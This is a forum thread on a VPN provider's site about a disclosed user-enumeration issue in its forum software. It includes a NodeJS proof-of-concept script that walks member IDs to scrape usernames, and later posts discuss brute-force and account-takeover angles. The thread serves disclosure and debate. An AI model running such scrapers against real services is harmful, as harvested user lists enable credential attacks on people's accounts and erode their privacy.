Jump to content
Not connected, Your IP: 18.215.159.156
Guest

ANSWERED [User Enumeration] AirVPN potential security issue disclosure: 15th February 2019

Recommended Posts

Guest

Over the last several weeks I've reported some potential issues for the AirVPN team to investigate. All issues relate to their use of the current forum software, IPB V3.

 

Today, I am disclosing the first potential issue for the communities consideration. The staff have a security policy which this issue was not considered under.

 

Disclosure details:

 

Reported: 15th Feb 2019 12:45PM

 

First reply by Clodo: 15th Feb 2019 13:04PM

Disclosure reply by myself: 15th Feb 2019 13:17PM (this reply contained the POC)

Second reply by Clodo: 15th Feb 2019 13:34PM

 

Reply asking for update: 19th Feb 2019 14:15PM

Staff reply: 19th Feb 2019 16:09PM

 

 

Disclosure information (taken directly from the ticket):

 

Details: Using your forum, it's possible to enumerate all users on your platform and track them based on their activity. This also allows somebody to maintain a list of every valid user account. This could be useful for brute-force attempts, such as trying each valid username with 'generic' passwords.

 

How: When you hover over a user on the forum, IPB makes a request to the following URL:

https://airvpn.org/index.php?s=[sESSION]&&app=members&module=ajax&secure_key=[KEY]&section=card&mid=63

Using this, we can build a PoC (below) to go through every "mid" from 0 to the latest (which is about 453,745).

 

 

POC. NodeJS:

 

 

const fs = require("fs");
const fetch = require('node-fetch');
const cheerio = require('cheerio');
const argv = require('minimist')(process.argv.slice(2));

const config = {
    base: "https://airvpn.org/index.php",
    s: "?s=[SESSION KEY]",
    app: "&app=members",
    module: "&module=ajax",
    secure_key:"&secure_key=[KEY HERE]",
    section: "&section=card",
    cache_dir: "./data/",
    cache_exists_dir: "./data-user-exists/"
}

let mid = 0;

function cacheData(dir, mid, data) {

    console.log("Caching data...");

    fs.writeFile(dir + mid + ".json", JSON.stringify(data), () => {});
}

async function fetchData(url) {

    console.log("Fetching data...");

    let res = await fetch(url)
    .then(res => res.text())
    .then(body => {return body;})

    let exists = true;

    if(res == "error") {
        exists = false;
    }

    let data = {
        "user_id": mid,
        "user_exists": exists,
        "html_file": mid + "-html.json",
        "data_file": mid + "-data.json",
        "user_data": null
    }

    if(res != "error") {

        let c = cheerio.load(res);

        let userData = {
            username: c(".nickname").text(),
            url: c(".ipsUserPhotoLink").attr("href")
        }

        data.user_data = JSON.stringify(userData);

        await cacheData(config.cache_exists_dir, mid + "-html", res);
        await cacheData(config.cache_exists_dir, mid + "-data", data);
    }
  
    await cacheData(config.cache_dir, mid + "-html", res);
    await cacheData(config.cache_dir, mid + "-data", data);

}

async function start() {

    console.log("Starting...");

    if(argv.end && mid > argv.end) {
        console.log("Ending...");
        return;
    }

    console.log("MID: ", mid);

    let url = config.base + config.s + config.app + config.module + config.secure_key + config.section + "&mid=" + mid;

    await fetchData(url);
    mid++;
    start();

}

function boot() {

    if(argv.start) {
        mid = argv.start;
    }

    start().catch(e => console.log);
}

boot();


//other URL:
//https://airvpn.org/index.php?app=core&module=search&do=user_activity&search_app=forums&mid=66&userMode=all&sid=[SID]
 

 

 

Staff reply:

Hello!

Since we have ascertained that this is the default, expected behavior of IPB, please consider to send your vulnerability disclosure to Invision team. T

his does not mean anyway that we may change this behavior, if possible, in the infrastructure next update. We also have a plan for 2FA for late 2019. Should you need additional replies from the developers, please do not hesitate to reply and the ticket will re-open automatically.

Kind regards
AirVPN Support Team

 

My reply:

 

Thanks for getting back to me.

I am not so certain how username enumeration isn't a bigger issue, especially for a VPN service.

I can find out how many members you have, which groups they belong to, when they were last active, and use that information to potentially target those particular accounts.

This behavior is undesirable at best and my PoC demonstrated how trivially easy it is to collect that information.

So far, I'm at 250,000 users and will have a complete list soon. Considering you do not have 2FA to this day (and have not for years), it is not certain if this has been abused before in being used to send automated login requests using known passwords. This can also be used to collect usernames and cross reference them in other datasets you can find across the internet for targeting.

Again, if I wanted to keep my username secret this is no longer possible.

Also, I noticed there is a group called "members2", on the surface it would appear this is a collection of all premium users, but I can't verify that for sure just yet.

This feature should be disabled on your forum and I should be credited for demonstrating how easy it has been to collect this information. It may not seem significant, but if it's not a big deal maybe I can publish this on your forums? I want to disclose this anyway as is the right thing to do.

Thanks.

 

My main concern with this, is that it's possible to collect a list of usernames, order them by when they were last active, and potentially use that as an attack vector, such as brute force attempts. Although, to AirVPN's credit, brute forcing is limited. I tried and after a few incorrect attempts the IP was blacklisted. Although this could be used to DOS the IP (such as AirVPN's own IPs) to prevent users login, it's a good security measure to prevent such attacks.

Share this post


Link to post

Note that brute force is not considered as a vulnerability nor an attack vector on any platform or bug bounty program.

Brute forcing is limited as a counter measure against annoying bots, not as an "anti hacking" mechanism.

A decent amount of those signups are actually bots with weak passwords, so at least you need to filter the premium users

in order to gain something from this attack.

But, even compromising a premium user will only allow you:

1) Downloading the users config in order to use the 5 connection slots

2) Post on the forums on their behalf

3) View their support tickets, if any

 

Since it's a public VPN, and a premium subscription is available to anyone, your maximum gain from the attack will be

a hacked premium account Which is quite an effort for a few Euros.


Occasional moderator, sometimes BOFH. Opinions are my own, except when my wife disagrees.

Share this post


Link to post

Note that brute force is not considered as a vulnerability nor an attack vector on any platform or bug bounty program.

Brute forcing is limited as a counter measure against annoying bots, not as an "anti hacking" mechanism.

A decent amount of those signups are actually bots with weak passwords, so at least you need to filter the premium users

in order to gain something from this attack.

But, even compromising a premium user will only allow you:

1) Downloading the users config in order to use the 5 connection slots

2) Post on the forums on their behalf

3) View their support tickets, if any

 

Since it's a public VPN, and a premium subscription is available to anyone, your maximum gain from the attack will be

a hacked premium account Which is quite an effort for a few Euros.

Magic work is privacy and has nothing to do with the few $ account that you will get. If I get access to an account I can go enable sessions archive and then I assume you will not be so happy.

A vpn has a privacy focus so being able to get all accounts is a major flaw of the platform. It's a flawed system. You can't have the same accounts on a forum and the service especially when it's paid and for privacy-conscious people. They should give the ability to all users to separate themselves from a forum account.

Second, having no step authentication (coming end of 2019 they said) makes the problem even worse. 

Share this post


Link to post

The session archive is only useful when you know which user to target specifically.

Which by then turns it into a classic brute force attack, even when you know which username to brute force.

I do agree that the problem is more severe in case users choose to use their personal email as the forum display name,

since then it does reveal a personal detail to the public and to the search engines.

 

A vpn has a privacy focus so being able to get all accounts is a major flaw of the platform.

 

Consider it like this - when you have a public forum, no matter which (IPB,vBulletin,PhpBB,SMF),

you will be able to see all the member list (logins). This is just how forums work


Occasional moderator, sometimes BOFH. Opinions are my own, except when my wife disagrees.

Share this post


Link to post

They should give the ability to all users to separate themselves from a forum account.

From a website design perspective. "Signin" and "Sign into Forums" would be a better way of addressing this.

which then would have totally different functions.purpose, level of access and do not relate to each other.

Suggestion: Move Forums button next to Signin and make it as a separate login.

Share this post


Link to post

The session archive is only useful when you know which user to target specifically.

Which by then turns it into a classic brute force attack, even when you know which username to brute force.

I do agree that the problem is more severe in case users choose to use their personal email as the forum display name,

since then it does reveal a personal detail to the public and to the search engines.

 

A vpn has a privacy focus so being able to get all accounts is a major flaw of the platform.

 

Consider it like this - when you have a public forum, no matter which (IPB,vBulletin,PhpBB,SMF),

you will be able to see all the member list (logins). This is just how forums work

Tell me a paid service based on a forum account. I am not debating how forums work so stop acting like this is what I am implying. 

Guessing account owner in some cases is not as hard as you may think with enough info on the user. There are multiple ways to reduce a pool of users. 

Share this post


Link to post
Guest

I've also found another, far more effective way of potentially brute forcing accounts which has been reported to the staff. AirVPN is the only provider I know that makes this enumeration technique possible.

 

Normally, getting access to an account shouldn't matter, but AirVPN's forum logs more than most providers, such as a session archive, connected sessions, when each key/device was last active, any payment information saved on the account, invoices and everything that can be found inside the client area.

 

This behavior is undesirable at best, and the brute forcing should at least be limited (maybe 3 incorrect login attempts) like most other sites on the internet.

 

But mainly, AirVPN doesn't tell you about your account security: there's no 'recent logins', or any way to know if somebody has access to your account. I guess each individual is responsible for their own security, but some monitoring is also appreciated.

Share this post


Link to post

Before this thread becomes even more grotesque than it is now, we would like just to remind you that no vulnerability has been found so far on this subject, so we invite the OP to publicly declare that he/she found no vulnerability and no exploit, or report them to us.

 

Kind regards

Share this post


Link to post
Guest

Before this thread becomes even more grotesque than it is now, we would like just to remind you that no vulnerability has been found so far on this subject, so we invite the OP to publicly declare that he/she found no vulnerability and no exploit, or report them to us.

 

Kind regards

This is correct - the only issue is information disclosure at play here, allowing an attacker to compile a list of usernames for targeting, it's honestly not the biggest issue in the world, but a VPN ideally shouldn't be disclosing their entire list of users.

Share this post


Link to post

This is correct - the only issue is information disclosure at play here, allowing an attacker to compile a list of usernames for targeting, it's honestly not the biggest issue in the world, but a VPN ideally shouldn't be disclosing their entire list of users.

 

Hello!

 

Good to hear that no vulnerability has surfaced and no exploit is available.

 

Kind regards

Share this post


Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
  • Security Check
    Play CAPTCHA Audio
    Refresh Image

×
×
  • Create New...